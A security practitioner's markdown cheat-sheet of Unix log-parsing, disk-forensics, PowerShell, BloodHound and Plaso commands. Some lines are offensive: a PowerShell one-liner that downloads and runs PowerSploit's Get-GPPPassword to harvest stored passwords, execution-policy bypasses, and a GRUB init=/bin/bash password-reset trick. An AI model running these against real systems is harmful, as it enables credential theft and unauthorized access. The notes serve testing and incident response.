Simple Commands And Other Things To Remember

simple_commands_and_reminders.md

Unix

Sorting

• Sorting by month and day:
  • sort -k1,1M -k2,2n
  • http://stackoverflow.com/questions/12162210/sort-by-just-month-name-and-day-bash
• Sorting IP Addresses
  • sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4
  • https://www.madboa.com/geek/sort-addr/
• Uniq only counts the instances that are close to each other, so sort first:
  • cat <file> | sort | uniq -c
• Spaces messes with cut and for loops
  • grep "Accepted" <file> | awk -v OFS=, '{print $4,$9,$11}'
  • Cut doesn't handle whitespace efficiently (e.g. two spaces in single digit dates for log file times). Thus, try awk.
  • That command should get you the hostname, user, and remote IP of someone logging into a system via SSHD.
• Split on a delimiter but only grab the first instance.
  • awk -F: '{ st = index($0,":");print substr($0,st+1)}' <filename>
• Use awk to search for a specific value in a field. This example comes from a Windows Event Log in text format. Field 22 is searched for Logon or Logoff events
  • grep -i success win_auth_events.txt | grep -v CHAP | awk '$22 ~ /Logon/' | wc -l
• Use awk to add uniq counts from first column. First is a loop method, second is just outputting directly to awk
  • for i in `awk '{ print $1 }' all_failed_message_ips_uniq.txt`; do ((sum += $i)); done; echo $sum
  • bzgrep -A 1 FAILED system.*.bz2 | grep repeat | awk '{ print $8 }' | awk '{s+=$1} END { print s }'
• Update passwd and sudo on encrypted Ubuntu system from local assess.
  • Boot and hit shift to get into grub menu.
  • In grub menu select "e"
    • Add init=/bin/bash to end of boot line
    • Hit F10 to reboot
  • Enter encryption password
    • If you need to use a command then cryptsetup luksOpen /dev/sda<#> sda<#>_crypt
  • Check mount and determine if read-only and mount point. Note mount point
    • mount
  • This will mount as read-only so you will have to remount as read-write
    • mount -o remount,rw /dev/mapper/ubuntu--hg--root /

Find

• Skip a directory when running the find command.
  • for i in `cat /tmp/search_items.txt`; do find . -not \\( -path ./skip_dir -prune \\) -name "*$i*"; done

Screen

• Screen References
  • http://wiki.networksecuritytoolkit.org/nstwiki/index.php/HowTo_Share_A_Terminal_Session_Using_Screen
  • http://unix.stackexchange.com/questions/163872/sharing-a-terminal-with-multiple-users-with-screen-or-otherwise
• screen commands
  • screen -d -m -S cutaway
  • screen -x userX/cutaway
• Add Users - Cntl-a
  • :acladd user0 user1 user2 user3
  • :acladd user4 user5 user6 user7 user8

Virus Scanning

• Clamscan
  • Update first sudo freshclam
  • Scan a mounted drive. Make sure it is Read-Only
    • sudo clamscan -r --bell -i -z --copy=./malware -l ./clamscan_system_<datetime>.txt /mnt/system
    • This scans the mounted drive recursively, rings the bell when it finds something, searches deep into the file if it finds something (id additional malware), copies that malware to a directory, and outputs to a log file.

Forensic Searches

• Timestamps
  • Formats - http://www.sandersonforensics.com/forum/content.php?131-A-brief-history-of-time-stamps&s=8751e9a50150dd0fd81880704bed16b6&
  • Linux
    • Simple explanation: http://www.unixtutorial.org/2008/04/atime-ctime-mtime-in-unix-filesystems/
    • File interaction explanations: http://articles.forensicfocus.com/2015/08/25/linux-timestamps-oh-boy/
  • Windows -
    • Windows 7 MFT - https://digital-forensics.sans.org/blog/2010/04/12/windows-7-mft-entry-timestamp-properties
    • Timestamp Manipulation - https://digital-forensics.sans.org/blog/2010/11/02/digital-forensics-time-stamp-manipulation/
• Find deleted information
  • Extract unallocated space from image
    • time blkls /mnt/image/disk.dd >~/cases/<name>/ARTIFACTS/disk.dd.blkls
    • http://wiki.sleuthkit.org/index.php?title=FS_Analysis
  • Search unallocated space with binwalk
    • binwalk disk.dd.blkls | tee -a ~/cases/<name>/ARTIFACTS/disk.dd.blkls_binwalk.txt
    • This will search the unallocated space for known signatures which can be extracted. This will return A LOT of false positives. Therefore, doing a run without extracting will save processing time, disk space, and review time. Once this is run, then the offsets can be used to grab additional details about the data at the specific offset.
  • Peek at interesting offsets in unallocated space
    • sift shebang disk.dd.blkls_binwalk.txt | grep bin | awk '{print $2}' | xargs -i{} xxd -s "{}" -l 512 -c 32 disk.dd.blkls | tee -a ~/cases/<name>/ARTIFACTS/disk.dd.blkls_binwalk_shebang_xxd_512.txt
    • This will look for all of the outputs detected as a shell script identified by "!# /bin/...". Looking for "bin" reduces false positives. The second argument is the hex offset which is grabbed and used to print 512 bytes from that location in 32 byte columns for human-readability. The results are saved for manual review.
  • Extract a specific location using Binwalk
    • binwalk -e --offset=0xdefc00 --length=0x1000 disk.dd.blkls
    • The offset for this command was taken from the location of the identified artifact. In this case it was a zip archive. The "length" was provided to stop processing so that the rest of the image wasn't extracted (might be a better way to do this). I actually subtracted about 0x100 bytes from offset and added 0x100 to length to make sure I got the whole file. Binwalk is smart enough to manage that. The output is written to the local directory for manual review, using "7z l file" and xxd, before additional extraction.
  • Extract data (an almost unmanageable amount of data) using Bulk_Extractor
    • bulk_extractor -x accts -x aes -x gps -x hiberfile -x httplogs -x json -x kml -x msxml -x rar -x sqlite -x vcard -x windirs -x winlnk -x winpe -x winprefetch -o ~/cases/<name>/ARTIFACTS/bulk_extract_data disk.dd.blkls
    • This will extract a VERY LARGE amount of data from a system. The next part of the analysis will be trying to sift through this information do locate key artifacts and outlyers that help identify attackers and their activity. Sometimes this means looking at the one-offs rather than the noisy things. But, that is all subjected to the case.

Windows

PowerShell Commands

• 15 Ways to Bypass the PowerShell Execution Policy
• Searching for Users in active directory (add a semicolon to first line to make a one-liner)
  • PS F:\> $content = Get-Content "C:\Users\cutaway\Documents\usernames.txt"
  • PS F:\> foreach ($line in $content) { try { Get-ADUser -Server “sub.domain.com” $line } catch {} }
• Using GPP Password
  • From PowerSploit GitHub:
    • PS> "IEX (new-object system.net.webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1')"; Get-GPPPassword
  • From Local file via cmd:
    • powershell -exec bypass import-module .\Get-GPPPassword.ps1; Get-GPPPassword
• Searching for interesting Powershell events in Windows Event logs
  • @Pyrotek3 - blog about PowerShell
    • PowerShell Security: Defending the Enterprise from the Latest Attack Platform
    • BSides Charm Presentation Posted: PowerShell Security: Defending the Enterprise from the Latest Attack Platform - PowerShell security
    • Detecting Offensive PowerShell Attack Tools
  • Detecting and Defending against PowerShell Shells - "defend against PowerShell P0wnage"
  • Powershell service started - "EventID 4688" - must have command line logging enabled.
  • The term "Invoke" it might be used for legitimate scripts, but you should generate a baseline to determine if your admins use it in their scripts.
  • The term "–ExecutionPolicy Bypass" - baseline to determine if admins use it.
  • Tom's Blog talks about this command being used during an attack. Note the terms "-NoProfile", "-windowstyle hidden", and "executionPolicy Unrestricted" - baseline to determine if admins use them.
    • PowerShell.exe -ExecutionPolicy Unrestricted -NoProfile -windowstyle hidden -File c:\\windows\\temp.ps1
  • Powershell Active Directory Information Gather
    • PS F:\> Get-AdUser -Server dom.domain.com -Filter * -Properties * -EV Err -EA "SilentlyContinue" | Format-Table SamAccountName,SID,EmployeeID,Enabled,Created,LastLogonDate -AutoSize -EV Err -EA "SilentlyContinue" | Out-String -Width 4096 -EV Err -EA "SilentlyContinue" | Out-File Get-ADUser_dom_20160810.txt
    • PS Cmds Erroring Out from too much content - solution
  • Bloodhound Commands from CMD
    • PS C:\~\BloodHound-master\PowerShell> Get-BloodHoundData | Export-BloodHoundData -URI http://localhost:7474/ -UserPass neo4j:BloodHound
  • Bloodhound Commands from PowerShell
    • Import-Module BloodHound.ps1
    • $bh_data = Get-BloodHoundData -EV Err -EA "SilentlyContinue"
    • $bh_data | Export-BloodHoundCSV -CSVFolder C:\Temp\
    • $bh_data | Export-BloodHoundData -URI http://localhost:7474/ -UserPass neo4j:BloodHound
      • Need to make this so that it populates a different database than the example.

ASP.NET

• Trace.axd - ALWAYS TEST FOR THIS!!!!!
  • How to: View ASP.NET Trace Information with the Trace Viewer: https://msdn.microsoft.com/en-us/library/wwh16c6c.aspx
  • A Safe Web (Automated Security Analyser for ASP.NET Websites): https://asafaweb.com/

OSX

Analyzing ASL files with Plaso

• Install Plaso using DMG
  • Running Plaso on OSX requires the use of the Plaso scripts to avoid collisions with other Python libraries. Each tool should have a ".sh" version. These will need to be run with sudo.
• Store logs in an artifact directory and create an analysis directory. Run log2timeline.sh from the artifact directory.
  • sudo log2timeline.sh -z PST8PDT --output l2ttln ../../ANALYSIS/cutaway/victim_asl_logs_l2t.l2tcsv .
• Check the Plaso output file using pinfo.sh
  • sudo pinfo.sh victim_asl_logs_l2t.l2tcsv
• Output is stored in Plaso format and requires psort.sh to review. Depending on the size of the data redirecting this to another file might speed up analysis and reporting.
  • sudo psort.sh victim_asl_logs_l2t.l2tcsv >victim_asl_logs_l2t.csv